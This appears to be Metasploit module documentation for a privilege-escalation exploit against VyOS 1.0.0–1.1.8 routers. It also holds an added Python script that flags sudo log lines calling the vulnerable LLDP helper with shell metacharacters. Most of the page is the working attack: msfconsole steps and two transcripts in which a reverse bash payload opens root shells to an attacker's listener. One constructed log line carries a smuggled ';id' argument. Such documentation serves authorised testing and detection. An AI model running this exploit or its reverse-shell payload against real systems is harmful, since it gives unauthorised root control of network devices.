Vulnerable Application
This module exploits command injection vulnerabilities and an insecure default sudo configuration on VyOS versions 1.0.0 through 1.1.8 to execute arbitrary system commands as root.
VyOS features a restricted-shell system shell intended for use by
low privilege users with operator privileges. This module exploits
a vulnerability in the telnet command to break out of the restricted
shell, then uses sudo to exploit a command injection vulnerability in
/opt/vyatta/bin/sudo-users/vyatta-show-lldp.pl to execute commands
with root privileges.
This module has been tested successfully on VyOS 1.1.8 amd64 and VyOS 1.0.0 i386.
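For detection, sudo's syslog records show each run of the helper script named above. The following is an added example, not part of the Metasploit module or of VyOS: it scans sudo log lines for root invocations of that script whose arguments contain shell metacharacters. The log lines are constructed, and `ARG value` is a placeholder for the script's real options, which this page does not list.

```python
import re

# Helper path taken from the module description above.
LLDP_SCRIPT = "/opt/vyatta/bin/sudo-users/vyatta-show-lldp.pl"

# Standard sudo syslog record:
#   sudo:  <user> : TTY=... ; PWD=... ; USER=<runas> ; COMMAND=<path> <args>
SUDO_RE = re.compile(
    r"sudo:\s+(?P<user>\S+) : .*?USER=(?P<runas>\S+) ; COMMAND=(?P<cmd>.+)$"
)

# Assumption: legitimate arguments to the helper never need shell metacharacters.
SHELL_META = re.compile(r"[;&|`$<>(){}\\'\"]")

# Constructed sample lines. "ARG value" is a placeholder, not the script's real syntax.
SAMPLE_LOG = [
    "Sep 18 11:30:01 vyos sudo:   jsmith : TTY=pts/0 ; PWD=/home/jsmith ; "
    "USER=root ; COMMAND=" + LLDP_SCRIPT + " ARG value",
    "Sep 18 11:30:48 vyos sudo:   jsmith : TTY=pts/0 ; PWD=/home/jsmith ; "
    "USER=root ; COMMAND=" + LLDP_SCRIPT + " ARG value;id",
    "Sep 18 11:31:10 vyos sudo:     vyos : TTY=pts/1 ; PWD=/home/vyos ; "
    "USER=root ; COMMAND=/bin/sh",
]


def suspicious_sudo_calls(lines):
    """Return (user, args) for root runs of the LLDP helper with shell metacharacters."""
    hits = []
    for line in lines:
        m = SUDO_RE.search(line)
        if not m or m.group("runas") != "root":
            continue
        # Split the logged command into the executable path and its argument string.
        path, _, args = m.group("cmd").strip().partition(" ")
        if path == LLDP_SCRIPT and SHELL_META.search(args):
            hits.append((m.group("user"), args))
    return hits


if __name__ == "__main__":
    for user, args in suspicious_sudo_calls(SAMPLE_LOG):
        print(f"ALERT user={user} args={args!r}")
```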
Verification Steps
Download:
Login as vyos / vyos.
Create a new user with operator privileges:
vyos@vyos:~$ configure
[edit]
vyos@vyos# set system login user jsmith full-name "John Smith"
[edit]
vyos@vyos# set system login user jsmith authentication plaintext-password password
[edit]
vyos@vyos# set system login user jsmith level operator
[edit]
vyos@vyos# commit
s[edit]
vyos@vyos# save
Saving configuration to '/config/config.boot'...
Done
Start the OpenSSH service:
vyos@vyos:~$ sudo sh
sh-4.1# service ssh start
- Start msfconsole
- Do: use exploit/linux/ssh/vyos_restricted_shell_privesc
- Do: set RHOSTS [IP]
- Do: set USERNAME [username]
- Do: set PASSWORD [password]
- Do: set payload [payload]
- Do: set LHOST [IP]
- Do: exploit
Options
USERNAME
SSH username (default: vyos)
PASSWORD
SSH password (default: vyos)
Scenarios
VyOS 1.1.8 (amd64) - operator user
msf6 > use exploit/linux/ssh/vyos_restricted_shell_privesc
[*] Using configured payload cmd/unix/reverse_bash
msf6 exploit(linux/ssh/vyos_restricted_shell_privesc) > set rhosts 172.16.191.158
rhosts => 172.16.191.158
msf6 exploit(linux/ssh/vyos_restricted_shell_privesc) > set username jsmith
username => jsmith
msf6 exploit(linux/ssh/vyos_restricted_shell_privesc) > set password password
password => password
msf6 exploit(linux/ssh/vyos_restricted_shell_privesc) > check
[*] 172.16.191.158:22 - The service is running, but could not be validated. SSH service detected.
msf6 exploit(linux/ssh/vyos_restricted_shell_privesc) > set lhost 172.16.191.165
lhost => 172.16.191.165
msf6 exploit(linux/ssh/vyos_restricted_shell_privesc) > run
[*] Started reverse TCP handler on 172.16.191.165:4444
[*] 172.16.191.158:22 - Attempt to login to VyOS SSH ...
[+] SSH connection established
[*] Requesting PTY ...
[+] PTY successfully obtained
[*] Requesting shell ...
[+] Remote shell successfully obtained
[*] Remote system is VyOS
[*] Remote session is using restricted-shell. Attempting breakout to system shell ...
[+] Unrestricted system shell successfully obtained. Sending payload ...
[*] Command shell session 1 opened (172.16.191.165:4444 -> 172.16.191.158:36030) at 2020-09-18 11:30:49 -0400
id
uid=0(root) gid=0(root) groups=0(root)
uname -a
Linux vyos 3.13.11-1-amd64-vyos #1 SMP Sat Nov 11 12:10:30 CET 2017 x86_64 GNU/Linux
cat /etc/issue
Welcome to VyOS - \n \l
VyOS 1.1.8 (amd64) - admin user
msf6 > use exploit/linux/ssh/vyos_restricted_shell_privesc
[*] Using configured payload cmd/unix/reverse_bash
msf6 exploit(linux/ssh/vyos_restricted_shell_privesc) > set rhosts 172.16.191.158
rhosts => 172.16.191.158
msf6 exploit(linux/ssh/vyos_restricted_shell_privesc) > set username vyos
username => vyos
msf6 exploit(linux/ssh/vyos_restricted_shell_privesc) > set password vyos
password => vyos
msf6 exploit(linux/ssh/vyos_restricted_shell_privesc) > check
[*] 172.16.191.158:22 - The service is running, but could not be validated. SSH service detected.
msf6 exploit(linux/ssh/vyos_restricted_shell_privesc) > set lhost 172.16.191.165
lhost => 172.16.191.165
msf6 exploit(linux/ssh/vyos_restricted_shell_privesc) > run
[*] Started reverse TCP handler on 172.16.191.165:4444
[*] 172.16.191.158:22 - Attempt to login to VyOS SSH ...
[+] SSH connection established
[*] Requesting PTY ...
[+] PTY successfully obtained
[*] Requesting shell ...
[+] Remote shell successfully obtained
[*] Remote system is VyOS
[*] Remote session is using unrestricted shell. Launching system shell ...
[+] Unrestricted system shell successfully obtained. Sending payload ...
[*] Command shell session 1 opened (172.16.191.165:4444 -> 172.16.191.158:36103) at 2020-09-18 11:32:49 -0400
id
uid=0(root) gid=0(root) groups=0(root)
uname -a
Linux vyos 3.13.11-1-amd64-vyos #1 SMP Sat Nov 11 12:10:30 CET 2017 x86_64 GNU/Linux
cat /etc/issue
Welcome to VyOS - \n \l